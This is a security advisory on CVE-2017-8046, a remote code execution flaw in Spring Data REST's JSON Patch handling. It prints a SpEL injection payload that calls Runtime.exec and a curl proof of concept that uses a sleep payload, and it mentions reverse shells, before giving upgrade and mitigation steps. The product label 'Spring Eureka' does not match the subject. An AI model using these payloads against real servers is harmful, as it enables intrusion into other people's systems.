CVE-2017-8046: Remote Code Execution Vulnerability via PATCH in Spring Data REST

ISGroup Cybersecurity

In 2017, a critical vulnerability (CVSS 9.8) was identified in Spring Data REST versions prior to 2.6.9 (Ingalls SR9) and 3.0.1 (Kay SR1), and in Spring Boot versions prior to 1.5.9 and 2.0 M6. This flaw allows remote attackers to execute arbitrary code on the server via specially crafted PATCH requests. Although the vulnerability was acknowledged and patched by the Spring team, no widespread cases of active exploitation have been reported at this time, likely due to the specificity of the attack, which requires JSON patch processing to be enabled and exposed.

ProductSpring Eureka
Date2025-06-02 10:53:23
Information
  • Trending
  • Fix Available

Technical Summary

The vulnerability stems from insecure deserialization and dangerous expression handling in how Spring Data REST processes PATCH requests with the application/json-patch+json content type.

Attackers can construct a JSON Patch operation using the Spring Expression Language (SpEL), as in the following example:

[
  {
    "op": "replace",
    "path": "T(java.lang.Runtime).getRuntime().exec(\"<command>\").x",
    "value": "pwned"
  }
]

This allows for the execution of arbitrary Java code (e.g., launching system commands or exfiltrating data). The expression is interpreted by the Spring framework’s SpEL engine due to a lack of input validation during PATCH handling.

Example of exploitation via curl:

curl --request PATCH \
  -H "Content-Type: application/json-patch+json" \
  -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' \
  http://localhost:8080/entity/1

This would delay the response by 10 seconds, demonstrating code execution.

More complex payloads can extract command output or establish reverse shells through runtime command execution.

Recommendations

  1. Update immediately:

    • Update Spring Data REST to version 2.6.9 or later (Ingalls SR9) or 3.0.1 or later (Kay SR1).
    • Update Spring Boot to version 1.5.9 or later or 2.0 M6 or later.
  2. Disable JSON PATCH support if not required:

    • JSON Patch is not commonly required in most REST APIs. If not used, disable support for application/json-patch+json.
  3. Filter and sanitize input:

    • Apply strict request validation to prevent malicious expressions from being interpreted.

[Callforaction-THREAT-Footer]